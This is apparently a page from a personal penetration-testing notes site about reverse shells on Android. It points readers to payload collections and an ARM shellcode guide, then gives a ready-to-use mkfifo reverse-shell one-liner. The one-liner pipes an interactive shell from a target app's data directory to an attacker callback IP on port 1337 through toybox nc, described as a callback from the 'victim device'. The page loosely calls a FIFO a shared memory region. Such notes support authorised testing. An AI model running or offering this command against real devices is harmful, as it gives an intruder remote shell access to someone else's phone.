description | cover | coverY | layout | ||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
06/17/2024 |
-14 |
|
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings" %} The goat {% endembed %}
{% embed url="https://www.revshells.com" %} The goat II {% endembed %}
{% content-ref url="../../binary-exploitation/shellcode/arm-shellcode.md" %} arm-shellcode.md {% endcontent-ref %}
{% hint style="info" %} Looking for shellcode? Be sure to check out my ARM Shellcode guide listed above! {% endhint %}
A solid reverse shell and somewhat mandatory one to make living-off-the-land (LOL) easier, is an mkfifo
reverse shell which is essentially a shared memory region for one or more applications or connections simultaneously.
mkfifo
stands for make first-in-first-out.
PoC:
"rm /data/data/com.target.application/f;/system/bin/toybox mkfifo /data/data/com.target.application/f;cat /data/data/com.target.application/f|/system/bin/sh -i 2>&1|/system/bin/toybox nc <callback_ip_here> 1337 >/data/data/com.target.application/f"
Getting a callback from the victim device